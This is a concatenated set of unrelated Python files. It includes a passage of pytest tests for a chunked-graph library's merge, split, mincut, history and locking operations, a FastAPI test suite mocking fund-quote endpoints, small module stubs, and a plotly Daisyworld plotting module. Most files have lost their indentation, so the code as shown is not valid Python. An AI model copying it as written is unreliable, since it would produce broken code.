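# Stress test: repeatedly merge and split the same edges; after every
# operation the graph must report a consistent set of roots and leaves.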
for i in range(10):
cgraph.logger.debug(f"\n\nITERATION {i}/10")
cgraph.logger.debug("\n\nMERGE 1 & 3\n\n")
new_roots = cgraph.add_edges("Jane Doe",
[to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 1)],
affinities=.9)
assert len(new_roots) == 1
assert len(cgraph.get_subgraph_nodes(new_roots[0])) == 4
root_ids = []
for child_id in child_ids:
root_ids.append(cgraph.get_root(child_id))
cgraph.logger.debug((child_id, cgraph.get_chunk_coordinates(child_id), root_ids[-1]))
parent_id = cgraph.get_parent(child_id)
cgraph.logger.debug((parent_id, cgraph.read_cross_chunk_edges(parent_id)))
u_root_ids = np.unique(root_ids)
assert len(u_root_ids) == 1
# ------------------------------------------------------------------
cgraph.logger.debug("\n\nSPLIT 2 & 3\n\n")
new_roots = cgraph.remove_edges("John Doe", to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 1), mincut=False)
assert len(np.unique(new_roots)) == 2
for root in new_roots:
cgraph.logger.debug(("SUBGRAPH", cgraph.get_subgraph_nodes(root)))
cgraph.logger.debug("test children")
root_ids = []
for child_id in child_ids:
root_ids.append(cgraph.get_root(child_id))
cgraph.logger.debug((child_id, cgraph.get_chunk_coordinates(child_id), cgraph.get_segment_id(child_id), root_ids[-1]))
cgraph.logger.debug((cgraph.get_atomic_node_info(child_id)))
cgraph.logger.debug("test root")
u_root_ids = np.unique(root_ids)
these_child_ids = []
for root_id in u_root_ids:
these_child_ids.extend(cgraph.get_subgraph_nodes(root_id, verbose=False))
cgraph.logger.debug((root_id, cgraph.get_subgraph_nodes(root_id, verbose=False)))
assert len(these_child_ids) == 4
assert len(u_root_ids) == 2
# ------------------------------------------------------------------
cgraph.logger.debug("\n\nSPLIT 1 & 3\n\n")
new_roots = cgraph.remove_edges("Jane Doe",
to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 1),
mincut=False)
assert len(new_roots) == 2
root_ids = []
for child_id in child_ids:
root_ids.append(cgraph.get_root(child_id))
cgraph.logger.debug((child_id, cgraph.get_chunk_coordinates(child_id), root_ids[-1]))
parent_id = cgraph.get_parent(child_id)
cgraph.logger.debug((parent_id, cgraph.read_cross_chunk_edges(parent_id)))
u_root_ids = np.unique(root_ids)
assert len(u_root_ids) == 3
# ------------------------------------------------------------------
cgraph.logger.debug("\n\nMERGE 2 & 3\n\n")
new_roots = cgraph.add_edges("Jane Doe",
[to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 1)],
affinities=.9)
assert len(new_roots) == 1
root_ids = []
for child_id in child_ids:
root_ids.append(cgraph.get_root(child_id))
cgraph.logger.debug((child_id, cgraph.get_chunk_coordinates(child_id), root_ids[-1]))
parent_id = cgraph.get_parent(child_id)
cgraph.logger.debug((parent_id, cgraph.read_cross_chunk_edges(parent_id)))
u_root_ids = np.unique(root_ids)
assert len(u_root_ids) == 2
for root_id in root_ids:
cross_edge_dict_layers = graph_tests.root_cross_edge_test(root_id, cg=cgraph) # dict: layer -> cross_edge_dict
n_cross_edges_layer = collections.defaultdict(list)
for child_layer in cross_edge_dict_layers.keys():
for layer in cross_edge_dict_layers[child_layer].keys():
n_cross_edges_layer[layer].append(len(cross_edge_dict_layers[child_layer][layer]))
for layer in n_cross_edges_layer.keys():
assert len(np.unique(n_cross_edges_layer[layer])) == 1
class TestGraphMinCut:
# TODO: Ideally, these tests should focus only on the mincut retrieving the correct edges.
# The edge removal part should be tested exhaustively in TestGraphSplit
@pytest.mark.timeout(30)
def test_cut_regular_link(self, gen_graph):
"""
Regular link between 1 and 2
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1━━┿━━2 │
│ │ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), 0.5)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), 0.5)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
# Mincut
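# The two coordinate lists below are assumed to be the voxel coordinates of
# the source and sink supervoxels, from which the mincut derives its local
# bounding box.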
new_root_ids = cgraph.remove_edges(
"Jane Doe", to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0),
[0, 0, 0], [2*cgraph.chunk_size[0], 2*cgraph.chunk_size[1], cgraph.chunk_size[2]],
mincut=True)
# Check New State
assert len(new_root_ids) == 2
assert cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0)) != cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 0, 0, 0, 0))
assert len(partners) == 0
partners, affinities, areas = cgraph.get_atomic_partners(to_label(cgraph, 1, 1, 0, 0, 0))
assert len(partners) == 0
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))))
assert len(leaves) == 1 and to_label(cgraph, 1, 0, 0, 0, 0) in leaves
leaves = np.unique(cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))))
assert len(leaves) == 1 and to_label(cgraph, 1, 1, 0, 0, 0) in leaves
@pytest.mark.timeout(30)
def test_cut_no_link(self, gen_graph):
"""
No connection between 1 and 2
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1 │ 2 │
│ │ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Mincut
with pytest.raises(cg_exceptions.PreconditionError):
cgraph.remove_edges(
"Jane Doe", to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0),
[0, 0, 0], [2*cgraph.chunk_size[0], 2*cgraph.chunk_size[1], cgraph.chunk_size[2]],
mincut=True)
res_new = cgraph.table.read_rows()
res_new.consume_all()
assert res_new.rows == res_old.rows
@pytest.mark.timeout(30)
def test_cut_old_link(self, gen_graph):
"""
Link between 1 and 2 got removed previously (aff = 0.0)
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1┅┅╎┅┅2 │
│ │ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), 0.5)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), 0.5)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]), time_stamp=fake_timestamp)
cgraph.remove_edges("John Doe", to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), mincut=False)
res_old = cgraph.table.read_rows()
res_old.consume_all()
# Mincut
with pytest.raises(cg_exceptions.PreconditionError):
cgraph.remove_edges(
"Jane Doe", to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0),
[0, 0, 0], [2*cgraph.chunk_size[0], 2*cgraph.chunk_size[1], cgraph.chunk_size[2]],
mincut=True)
res_new = cgraph.table.read_rows()
res_new.consume_all()
assert res_new.rows == res_old.rows
@pytest.mark.timeout(30)
def test_cut_indivisible_link(self, gen_graph):
"""
Sink: 1, Source: 2
Link between 1 and 2 is set to `inf` and must not be cut.
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1══╪══2 │
│ │ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0), inf)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 0, 0, 0, 0), inf)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
original_parents_1 = cgraph.get_all_parents(
to_label(cgraph, 1, 0, 0, 0, 0))
original_parents_2 = cgraph.get_all_parents(
to_label(cgraph, 1, 1, 0, 0, 0))
# Mincut
assert cgraph.remove_edges(
"Jane Doe", to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0),
[0, 0, 0], [2 * cgraph.chunk_size[0], 2 * cgraph.chunk_size[1],
cgraph.chunk_size[2]],
mincut=True) is None
new_parents_1 = cgraph.get_all_parents(to_label(cgraph, 1, 0, 0, 0, 0))
new_parents_2 = cgraph.get_all_parents(to_label(cgraph, 1, 1, 0, 0, 0))
assert np.all(np.array(original_parents_1) == np.array(new_parents_1))
assert np.all(np.array(original_parents_2) == np.array(new_parents_2))

class TestGraphMultiCut:
@pytest.mark.timeout(30)
def test_cut_multi_tree(self, gen_graph):
pass

class TestGraphHistory:
""" These test inadvertantly also test merge and split operations """
@pytest.mark.timeout(30)
def test_cut_merge_history(self, gen_graph):
"""
Regular link between 1 and 2
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1━━┿━━2 │
│ │ │
└─────┴─────┘
(1) Split 1 and 2
(2) Merge 1 and 2
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0), 0.5)],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 0, 0, 0, 0), 0.5)],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
first_root = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))
assert first_root == cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
timestamp_before_split = datetime.utcnow()
split_roots = cgraph.remove_edges("Jane Doe",
to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0),
mincut=False)
assert len(split_roots) == 2
timestamp_after_split = datetime.utcnow()
merge_roots = cgraph.add_edges("Jane Doe",
[to_label(cgraph, 1, 0, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0)],
affinities=.4)
assert len(merge_roots) == 1
merge_root = merge_roots[0]
timestamp_after_merge = datetime.utcnow()
assert len(cgraph.get_root_id_history(first_root,
time_stamp_past=datetime.min,
time_stamp_future=datetime.max)) == 4
assert len(cgraph.get_root_id_history(split_roots[0],
time_stamp_past=datetime.min,
time_stamp_future=datetime.max)) == 3
assert len(cgraph.get_root_id_history(split_roots[1],
time_stamp_past=datetime.min,
time_stamp_future=datetime.max)) == 3
assert len(cgraph.get_root_id_history(merge_root,
time_stamp_past=datetime.min,
time_stamp_future=datetime.max)) == 4
new_roots, old_roots = cgraph.get_delta_roots(timestamp_before_split,
timestamp_after_split)
assert len(old_roots) == 1
assert old_roots[0] == first_root
assert len(new_roots) == 2
assert np.all(np.isin(new_roots, split_roots))
new_roots2, old_roots2 = cgraph.get_delta_roots(timestamp_after_split,
timestamp_after_merge)
assert len(new_roots2) == 1
assert new_roots2[0] == merge_root
assert len(old_roots2) == 2
assert np.all(np.isin(old_roots2, split_roots))
new_roots3, old_roots3 = cgraph.get_delta_roots(timestamp_before_split,
timestamp_after_merge)
assert len(new_roots3) == 1
assert new_roots3[0] == merge_root
assert len(old_roots3) == 1
assert old_roots3[0] == first_root

class TestGraphLocks:
@pytest.mark.timeout(30)
def test_lock_unlock(self, gen_graph):
"""
No connection between 1, 2 and 3
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1 │ 3 │
│ 2 │ │
└─────┴─────┘
(1) Try lock (opid = 1)
(2) Try lock (opid = 2)
(3) Try unlock (opid = 1)
(4) Try lock (opid = 2)
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 1),
to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
operation_id_1 = cgraph.get_unique_operation_id()
root_id = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))
assert cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_1)[0]
operation_id_2 = cgraph.get_unique_operation_id()
assert not cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_2)[0]
assert cgraph.unlock_root(root_id=root_id,
operation_id=operation_id_1)
assert cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_2)[0]
@pytest.mark.timeout(30)
def test_lock_expiration(self, gen_graph, lock_expired_timedelta_override):
"""
No connection between 1, 2 and 3
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1 │ 3 │
│ 2 │ │
└─────┴─────┘
(1) Try lock (opid = 1)
(2) Try lock (opid = 2)
(3) Try lock (opid = 2) with retries
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 1),
to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
operation_id_1 = cgraph.get_unique_operation_id()
root_id = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))
assert cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_1)[0]
operation_id_2 = cgraph.get_unique_operation_id()
assert not cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_2)[0]
assert cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_2,
max_tries=10, waittime_s=.5)[0]
@pytest.mark.timeout(30)
def test_lock_renew(self, gen_graph):
"""
No connection between 1, 2 and 3
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1 │ 3 │
│ 2 │ │
└─────┴─────┘
(1) Try lock (opid = 1)
(2) Try lock (opid = 2)
(3) Try lock (opid = 2) with retries
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 1),
to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
operation_id_1 = cgraph.get_unique_operation_id()
root_id = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))
assert cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_1)[0]
assert cgraph.check_and_renew_root_locks(root_ids=[root_id],
operation_id=operation_id_1)
@pytest.mark.timeout(30)
def test_lock_merge_lock_old_id(self, gen_graph):
"""
No connection between 1, 2 and 3
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1 │ 3 │
│ 2 │ │
└─────┴─────┘
(1) Merge (includes lock opid 1)
(2) Try lock opid 2 --> should be successful and return new root id
"""
cgraph = gen_graph(n_layers=3)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 1),
to_label(cgraph, 1, 0, 0, 0, 2)],
edges=[],
timestamp=fake_timestamp)
# Preparation: Build Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]),
time_stamp=fake_timestamp)
root_id = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 1))
new_root_ids = cgraph.add_edges("Chuck Norris", [to_label(cgraph, 1, 0, 0, 0, 1),
to_label(cgraph, 1, 0, 0, 0, 2)], affinities=1.)
assert new_root_ids is not None
operation_id_2 = cgraph.get_unique_operation_id()
success, new_root_id = cgraph.lock_root_loop(root_ids=[root_id],
operation_id=operation_id_2,
max_tries=10, waittime_s=.5)
cgraph.logger.debug(new_root_id)
assert success
assert new_root_ids[0] == new_root_id
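
The four lock tests above all follow the same acquire/edit/release protocol. A condensed sketch of that flow, reusing only calls that appear in the tests (cgraph and root_id are assumed to come from the gen_graph fixture as above):

# Sketch of the locking protocol exercised by TestGraphLocks; cgraph and
# root_id are assumed to come from the gen_graph fixture used above.
op_id = cgraph.get_unique_operation_id()
success, latest_root_ids = cgraph.lock_root_loop(root_ids=[root_id],
                                                 operation_id=op_id,
                                                 max_tries=10, waittime_s=.5)
if success:
    try:
        ...  # perform the merge/split edit here
    finally:
        cgraph.unlock_root(root_id=root_id, operation_id=op_id)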

[594bfb1a451c5278cb6eb0568922591b031e3438] office365/sharepoint/search/query/popularTenantQuery.py | wreiner/Office365-REST-Python-Client | MIT | 105 bytes | 544 stars

from office365.runtime.client_value import ClientValue


class PopularTenantQuery(ClientValue):
    pass

[59728e393c4e17abe11271bfcc3dd74f28baee1f] platehunter/platehunter/module/__init__.py | ZombieIce/A-Stock-Plate-Crawling | MIT | 28 bytes | 20 stars

from .crawler import Crawler

[59987eb32850dcd0908c67453364b8a38745fe6e] tests/unit/test_thicket/test_finders.py | GabrielC101/filer | MIT | 68 bytes

from thicket import finders


def test_import():
    assert finders

[59d7e8494ca25c551fbec6bc143f2353d97b0f85] d3ct/plugins/out/__init__.py | metro-nom/d3ct | BSD-3-Clause | 42 bytes

# flake8: noqa
from .stdout import StdOut

[ab7b6735b1b7be9de1c5c14faeb2e6fcf2f517be] BirdCommandTests/Resources/hello.py | hergin/BirdCommand | Apache-2.0 | 43 bytes

import sys
print("Hello, "+sys.argv[1]+"!")

[abafaffe850f5ad038e992cc605a8658d0b5ae83] app/routers/brandnewday_test.py | nbult/quotes | MIT | 7,158 bytes

import json
from datetime import date, datetime
import pytest
import responses
from fastapi.testclient import TestClient
from .brandnewday import funds_cache, quote_cache
from ..main import app
from ..models import Quote
client = TestClient(app)
prefix = '/brandnewday/'
@pytest.fixture(autouse=True)
def clear_cache():
funds_cache.clear()
quote_cache.clear()
yield
def setup_get_funds_response():
body = {'Message': json.dumps([{"Key": "1002", "Value": "bnd-wereld-indexfonds-c-hedged"},
{"Key": "1012", "Value": "bnd-wereld-indexfonds-c-unhedged"}])}
responses.add(responses.GET, 'https://secure.brandnewday.nl/service/getfundsnew/', json=body, status=200)
@responses.activate
def test_get_funds_returns_funds_list():
setup_get_funds_response()
response = client.get(prefix, allow_redirects=False)
assert response.status_code == 200
assert response.json() == ['bnd-wereld-indexfonds-c-hedged', 'bnd-wereld-indexfonds-c-unhedged']
@responses.activate
def test_get_funds_returns_502():
responses.add(responses.GET, 'https://secure.brandnewday.nl/service/getfundsnew/',
body='error', status=502)
response = client.get(prefix, allow_redirects=False)
assert response.status_code == 502
def test_get_quotes_unknown_name_returns_http404():
setup_get_funds_response()
response = client.get(prefix + 'unknown', allow_redirects=False)
assert response.status_code == 404
@responses.activate
def test_get_quotes_server_error_returns_http502():
setup_get_funds_response()
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
body='error',
status=500
)
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert response.status_code == 502
@responses.activate
def test_get_quotes_invalid_page():
setup_get_funds_response()
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged?page=0')
assert response.status_code == 400
@responses.activate
def test_get_quotes_known_name_returns_http200():
setup_get_funds_response()
body = {'Data': [
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535882, 'BidRate': 13.535882, 'AskRate': 13.535882,
'RateDate': '/Date(1616284800000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535846, 'BidRate': 13.535846, 'AskRate': 13.535846,
'RateDate': '/Date(1616198400000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535809, 'BidRate': 13.535809, 'AskRate': 13.535809,
'RateDate': '/Date(1616112000000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
],
'Total': 1224, 'AggregateResults': None, 'Errors': None}
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
json=body,
headers={'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'},
match=[
responses.urlencoded_params_matcher({'page': '1',
'pageSize': '60',
'fundId': '1012',
'startDate': '01-01-2010',
'endDate': date.today().strftime('%d-%m-%Y'),
})
],
status=200
)
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert len(quote_cache) == 1
assert response.status_code == 200
assert response.json() == [{'Close': 13.535882, 'Date': '2021-03-21T00:00:00'},
{'Close': 13.535846, 'Date': '2021-03-20T00:00:00'},
{'Close': 13.535809, 'Date': '2021-03-19T00:00:00'}]
@responses.activate
def test_get_quotes_are_cached():
setup_get_funds_response()
body = {'Data': [
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535882, 'BidRate': 13.535882, 'AskRate': 13.535882,
'RateDate': '/Date(1616284800000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535846, 'BidRate': 13.535846, 'AskRate': 13.535846,
'RateDate': '/Date(1616198400000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535809, 'BidRate': 13.535809, 'AskRate': 13.535809,
'RateDate': '/Date(1616112000000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
],
'Total': 1224, 'AggregateResults': None, 'Errors': None}
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
json=body,
headers={'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'},
match=[responses.urlencoded_params_matcher(
{'page': '1', 'pageSize': '60', 'fundId': '1012', 'startDate': '01-01-2010',
'endDate': date.today().strftime('%d-%m-%Y')})],
status=200
)
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
body='error',
headers={'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'},
match=[responses.urlencoded_params_matcher(
{'page': '1', 'pageSize': '60', 'fundId': '1012', 'startDate': '01-01-2010',
'endDate': date.today().strftime('%d-%m-%Y')})],
status=500
)
assert len(quote_cache) == 0
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert response.status_code == 200
assert response.json() == [{'Close': 13.535882, 'Date': '2021-03-21T00:00:00'},
{'Close': 13.535846, 'Date': '2021-03-20T00:00:00'},
{'Close': 13.535809, 'Date': '2021-03-19T00:00:00'}]
assert len(quote_cache) == 1
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert response.status_code == 200
assert quote_cache['1012@1'] == [Quote(Date=datetime(2021, 3, 21, 0, 0, 0), Close=13.535882),
Quote(Date=datetime(2021, 3, 20, 0, 0, 0), Close=13.535846),
Quote(Date=datetime(2021, 3, 19, 0, 0, 0), Close=13.535809)]
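
Every test in this file leans on the responses library to intercept outgoing HTTP calls. A minimal standalone sketch of that mocking pattern; the URL and payload are illustrative and not part of the original file:

import requests
import responses


@responses.activate
def test_mocked_get():
    # Register a canned reply; any GET to this URL is answered in-process,
    # so no real network I/O happens.
    responses.add(responses.GET, 'https://example.com/api',
                  json={'ok': True}, status=200)
    assert requests.get('https://example.com/api').json() == {'ok': True}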

[abe3cbe49477fe37d4fc16249de8a10f4fb4a013] mit_semseg/lib/utils/__init__.py | starkgines/PDI | BSD-3-Clause | 18 bytes | 4,303 stars

from .th import *

[abe9baf8318a46fc0311d26e659c7ccdb9f8b58b] util/time.py | thorwhalen/ut | MIT | 162 bytes | 4 stars

from warnings import warn
warn('Deprecated: Moved to ut.util.utime (to avoid name conflict with standard lib `time`)')
from ut.util.utime import * # move here

[e64e4471df6551917b2b1289cce293fbc929f162] daisy-world/dashdir/plotting.py | frossmann/addon_containers | BSD-3-Clause | 12,219 bytes

import plotly.graph_objects as go
import plotly.figure_factory as ff
import numpy as np
import calculations as calc
from plotly.subplots import make_subplots
def initialize_albedo_plot(T_min, T_opt):
# what does the growth curve of the daisies look like?
gw = []
gb = []
# number of intervals to plot
nt = 20
t0 = 0
t1 = 45
dT = (t1 - t0) / nt
tempv = [t0 + i * dT for i in range(nt)]
for t in tempv:
gw.append(calc.DaisyGrowth(t + 273.15, "w", T_min, T_opt))
gb.append(calc.DaisyGrowth(t + 273.15, "b", T_min, T_opt))
albedo_plot = go.Figure()
albedo_plot.add_hrect(
xref="paper",
yref="paper",
x0=1,
x1=1.5,
y0=-15,
y1=100,
line_width=0,
fillcolor="white",
opacity=1,
)
albedo_plot.update_xaxes(showgrid=True, zeroline=False)
albedo_plot.update_yaxes(showgrid=True, zeroline=False)
albedo_plot.add_trace(go.Scatter(x=tempv, y=gw, name="gw"))
albedo_plot.add_trace(go.Scatter(x=tempv, y=gb, name="gb"))
albedo_plot.update_layout(xaxis_title="tempv", yaxis_title="growth")
albedo_plot.update_layout(xaxis_title="Temp [degC]", yaxis_title="Ratio")
albedo_plot.update_xaxes(range=[0, t1])
albedo_plot.update_yaxes(range=[0, 1])
albedo_plot.layout.title = "Growth curve of daisies"
return albedo_plot
def constant_flux_temp(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt
):
# initial areas are embedded in here but should be passed in as an
# argument later if we want to change the initial conditions
# externally...
areas = {"w": 0.01, "b": 0.01} # initial conditions for area
# solve the constant flux problem:
xgens, gens = calc.update_constant_flux(
Fsnom, Albedo, rat, em_p, sig, ins_p, death, minarea, T_min, T_opt, areas
)
# temperatures plot
fig = go.Figure()
fig.add_hrect(
xref="paper",
yref="paper",
x0=1,
x1=1.5,
y0=-15,
y1=100,
line_width=0,
fillcolor="white",
opacity=1,
)
fig.update_xaxes(showgrid=True, zeroline=False)
fig.update_yaxes(showgrid=True, zeroline=False)
fig.add_trace(
go.Scatter(
x=gens,
y=[x["Tw"] - 273.15 for x in xgens],
name="White daisies temperature",
line=dict(color="lavender", width=8),
)
)
fig.add_trace(
go.Scatter(
x=gens,
y=[x["Tb"] - 273.15 for x in xgens],
name="Black daisies temperature",
line=dict(color="black", width=3),
)
)
fig.add_trace(
go.Scatter(
x=gens,
y=[x["Tp"] - 273.15 for x in xgens],
name="Planet temperature",
line=dict(color="seagreen", width=5, dash="dot"),
)
)
fig.update_layout(
xaxis_title="Simulation Time (Daisy generation #)",
yaxis_title="Temperature [degC]",
)
fig.update_xaxes(range=[0, len(gens)])
fig.update_yaxes(range=[10, 40])
fig.layout.title = "Constant flux temperature with daisy generation"
fig.update_layout(plot_bgcolor="silver")
return fig
